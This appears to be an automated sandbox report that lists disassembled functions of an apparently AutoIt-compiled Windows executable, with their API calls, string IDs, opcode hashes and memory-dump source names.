                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3869813825-0
                                                                                                                                                                              • Opcode ID: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                                                                                                                                              • Instruction ID: 2ef33349f52befd88abf5c4e5bc483b5689367e33f5d5a7f710d20b00a32c9ca
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B518D70900709AFDB209FA9DD8AF6FBBF5FF04705F004529E596A26A1C774A848DB14
                                                                                                                                                                              Function 005001E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0050026A
                                                                                                                                                                              • _wcschr.LIBCMT ref: 00500278
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0050028F
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050029E
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005002BC
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005002DD
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 005003BA
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005003DF
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005003F1
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00500406
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050041B
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050042D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500442
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscmp.LIBCMT ref: 004FC92A
                                                                                                                                                                                • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC96F
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscpy.LIBCMT ref: 004FC982
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC995
                                                                                                                                                                                • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC9BA
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9D0
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9E3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                              • API String ID: 2955681530-2806939583
                                                                                                                                                                              • Opcode ID: b25ddbac2f3dc39da312e85fc58ef6e5dcfd85143daeb13d83621f6ac0dbefef
                                                                                                                                                                              • Instruction ID: 03b2f6ee0750feaedaaa980fac81a034c6b10fd2a161fe55d5a3c531c839662b
                                                                                                                                                                              • Opcode Fuzzy Hash: b25ddbac2f3dc39da312e85fc58ef6e5dcfd85143daeb13d83621f6ac0dbefef
                                                                                                                                                                              • Instruction Fuzzy Hash: 88919271504705AFCB20EF51C955F9EB7E8BF84318F00485EF945972A2EB38EA48CB5A
                                                                                                                                                                              Function 0051CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051CD0B
                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 0051CD83
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0051CE04
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0051CE26
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CE35
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 0051CE52
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004B0000,00000000), ref: 0051CE85
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CEA4
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0051CEB9
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0051CEC0
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051CED2
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0051CEEA
                                                                                                                                                                                • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                                                                              • Opcode ID: 38a696ef8eb8bda611f1babb8904d4333699fc3a7365d16281b1878b17c97208
                                                                                                                                                                              • Instruction ID: 7f592787463e32f6c172cb2a272490df270afd53b3243004cbcc1fb5d4d30f39
                                                                                                                                                                              • Opcode Fuzzy Hash: 38a696ef8eb8bda611f1babb8904d4333699fc3a7365d16281b1878b17c97208
                                                                                                                                                                              • Instruction Fuzzy Hash: 0771AB71180205AFE721CF68DC45FA63FE9FB89704F08051DF985972A1CB75E845DB26
                                                                                                                                                                              Function 0051F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0051F14B
                                                                                                                                                                                • Part of subcall function 0051D5EE: ClientToScreen.USER32(?,?), ref: 0051D617
                                                                                                                                                                                • Part of subcall function 0051D5EE: GetWindowRect.USER32(?,?), ref: 0051D68D
                                                                                                                                                                                • Part of subcall function 0051D5EE: PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F1B4
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051F1BF
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0051F1E2
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0051F212
                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0051F229
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F242
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F259
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F27B
                                                                                                                                                                              • DragFinish.SHELL32(?), ref: 0051F282
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0051F36D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                              • API String ID: 169749273-3440237614
                                                                                                                                                                              • Opcode ID: 24ea1902be38c1565b45c3ea8c58b2d0ea96db67392ce02a1559fe8a513c4065
                                                                                                                                                                              • Instruction ID: 06427f60a374b93390363bd45c740551d0bebf492699ce5f1ac53fa9394c8e65
                                                                                                                                                                              • Opcode Fuzzy Hash: 24ea1902be38c1565b45c3ea8c58b2d0ea96db67392ce02a1559fe8a513c4065
                                                                                                                                                                              • Instruction Fuzzy Hash: B9616A71008301AFD700EF64DC85E9BBBF8BF89714F000A2EF595932A1DB709A49DB66
                                                                                                                                                                              Function 004FB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 004FB46D
                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004FB476
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004FB482
                                                                                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004FB561
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FB591
                                                                                                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 004FB5BD
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004FB63F
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000016), ref: 004FB6D1
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004FB727
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004FB736
                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 004FB772
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                              • API String ID: 3730832054-3931177956
                                                                                                                                                                              • Opcode ID: efd0d31b9384cd693f8579f200e78d81d867746a5bfcb00bf675f04cf64340d6
                                                                                                                                                                              • Instruction ID: c2a6363094e372987432f9d2cad9a1d7169c63f8b0ded09af73e1ee64867e44a
                                                                                                                                                                              • Opcode Fuzzy Hash: efd0d31b9384cd693f8579f200e78d81d867746a5bfcb00bf675f04cf64340d6
                                                                                                                                                                              • Instruction Fuzzy Hash: F6C10331A00219EBCB10DF66D484B7AB7B4FF06300F14846BE6059B641DB78DC55DBEA
                                                                                                                                                                              Function 00516F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00516FF9
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00517044
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                                                                                              • Opcode ID: ed6397cb67b165e5b9d0062ba52d993d10ec17c7390a93c4eb50b2c86a6352c7
                                                                                                                                                                              • Instruction ID: 78e9fc93a9dd5e40a0459df48b3a95564df67053375a8e22ab57b5e7f6e5ba7e
                                                                                                                                                                              • Opcode Fuzzy Hash: ed6397cb67b165e5b9d0062ba52d993d10ec17c7390a93c4eb50b2c86a6352c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 4091A4342047019FDB04EF15C851BAABBE2BF88358F04485EF8965B392DB39ED4ACB55
                                                                                                                                                                              Function 0051E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0051E3BB
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0051BCBF), ref: 0051E417
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E457
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E49C
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E4D3
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0051BCBF), ref: 0051E4DF
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0051E4EF
                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,0051BCBF), ref: 0051E4FE
                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0051E51B
                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0051E527
                                                                                                                                                                                • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                              • API String ID: 1212759294-1154884017
                                                                                                                                                                              • Opcode ID: eb6620962b387279f7cea71e8a6608b1d8ae975844d8c9e7b4c73bd0f2fde752
                                                                                                                                                                              • Instruction ID: 14a875b681f639061b13ba64b19e781d27683cb3ad1016979f3b6fc6b71a9857
                                                                                                                                                                              • Opcode Fuzzy Hash: eb6620962b387279f7cea71e8a6608b1d8ae975844d8c9e7b4c73bd0f2fde752
                                                                                                                                                                              • Instruction Fuzzy Hash: 9061AE71500215BAEF14DF64DC86FEA7BB8BB08714F10451AF915E71D0EBB8A980DBA0
                                                                                                                                                                              Function 00500E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00500EFF
                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00500F0F
                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00500F1B
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00500F79
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500F91
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500FA3
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500FB8
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FCC
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FFE
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0050101F
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0050102B
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050106A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 3566783562-438819550
                                                                                                                                                                              • Opcode ID: 93f8b7b225874b86d6255af238948178bd905c2e1ce93b11af86a5b5e203432b
                                                                                                                                                                              • Instruction ID: 259401b8db66a9c536d40c3b4f1e96ad7d5a27e73d65f6bd8acd14f9ddddc00f
                                                                                                                                                                              • Opcode Fuzzy Hash: 93f8b7b225874b86d6255af238948178bd905c2e1ce93b11af86a5b5e203432b
                                                                                                                                                                              • Instruction Fuzzy Hash: 78618CB6504705AFC710EF20C854A9EB7E8FF89314F00881EF98997291EB35E945CBA6
                                                                                                                                                                              Function 004FDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 004FDB26
                                                                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 004FDB73
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBBB
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBF2
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDC20
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                              • API String ID: 2698844021-4113822522
                                                                                                                                                                              • Opcode ID: cb39781fc9aa0a8077d478bdfb8a0b66a73f36ffc793200a48f78e93b5b535eb
                                                                                                                                                                              • Instruction ID: 92dfcfc8430f73820e70bf4c7b366a0c775f33711e5a3189f99e54334ed21407
                                                                                                                                                                              • Opcode Fuzzy Hash: cb39781fc9aa0a8077d478bdfb8a0b66a73f36ffc793200a48f78e93b5b535eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8C514771504205AFC700EF11C9819ABB7F9FF88758F00486EF895972A1DB75EE0ACB66
                                                                                                                                                                              Function 004F3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 004F3145
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F314E
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 004F3170
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F3173
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F31B3
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F31C5
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004F326C
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3283
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                                                                              • Opcode ID: 9cf6deb95a549be348021a5d13bf203143d6f9d11130e406b0965cb5daa60ace
                                                                                                                                                                              • Instruction ID: 825197bbeac793b1653b2394dcbcbd447a4ff6690cc61aa41457e70d9b8aa668
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf6deb95a549be348021a5d13bf203143d6f9d11130e406b0965cb5daa60ace
                                                                                                                                                                              • Instruction Fuzzy Hash: A641637190021DA6CB04FBE2DD86EEFB778AF14705F10046BF601B21A2DA696F08DA75
                                                                                                                                                                              Function 004FD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004FD96C
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD98E
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD9CB
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004FD9F0
                                                                                                                                                                              • _memset.LIBCMT ref: 004FDA0F
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 004FDA4B
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004FDA80
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004FDA8B
                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004FDA94
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004FDA9E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
